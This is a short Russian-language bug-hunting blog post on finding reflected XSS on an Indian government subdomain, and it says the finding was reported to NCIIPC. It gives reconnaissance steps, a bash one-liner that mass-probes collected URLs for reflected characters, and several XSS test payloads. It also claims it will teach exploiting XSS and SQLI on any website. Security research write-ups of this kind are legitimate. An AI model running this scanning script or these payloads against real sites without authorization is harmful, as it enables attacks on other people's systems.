Как я нашел Reflected XSS на *.GOV.IN

May 02 2023
Этот блог поможет вам найти все уязвимые параметры любого веб-приложения. Он также научит вас использовать уязвимости, такие как XSS и SQLI, на любом веб-сайте.

Этот блог поможет вам найти все уязвимые параметры любого веб-приложения. Он также научит вас использовать уязвимости, такие как XSS и SQLI, на любом веб-сайте.

Что такое отраженный XSS:

Отраженный межсайтовый скриптинг (или XSS) — это уязвимость системы безопасности, которая возникает, когда приложение получает данные в HTTP-запросе и сохраняет их в ответе без надлежащей фильтрации и очистки.

Давайте двигаться шаг за шагом:

Выберите домен: *.gov.in

Шаг 1: Найдите все возможные поддомены в выбранном домене

Шаг 2. Выберите любой субдомен.

Шаг 3: Узнайте все возможные параметры с помощью такого инструмента, как Paramspider .

Шаг 4. Проверьте все URL-адреса, которые напрямую отражают специальные символы.

Для автоматизации используйте следующий скрипт:

cat urls.txt| egrep -iv ".(jpg|jpeg|js|css|gif|tif|tiff|png|woff|woff2|ico|pdf|svg|txt)" | qsreplace '"><()'| tee combinedfuzz.json && cat combinedfuzz.json | while read host do ; do curl --silent --path-as-is --insecure "$host" | grep -qs "\"><()" && echo -e "$host \033[91m Vullnerable \e[0m \n" || echo -e "$host  \033[92m Not Vulnerable \e[0m \n"; done | tee XSS.txt

      
                

Шаг 5. Попробуйте вручную прямо сейчас:

Давайте попробуем базовую полезную нагрузку XSS:

"><script>alert(1);</script>

Введите полезную нагрузку

Нет всплывающих окон:

Давайте начнем с самого начала:

Просто попробуйте с: одинарная кавычка

'

      
                
No Errors

Теперь попробуйте с некоторыми событиями:

' onmouseover=alert(1);>

      
                

Давайте посмотрим исходный код:

Мы получили XSS, теперь отчитываемся перед NCIIPC

Контакты:

https://www.linkedin.com/in/prince-prafull-19a477194/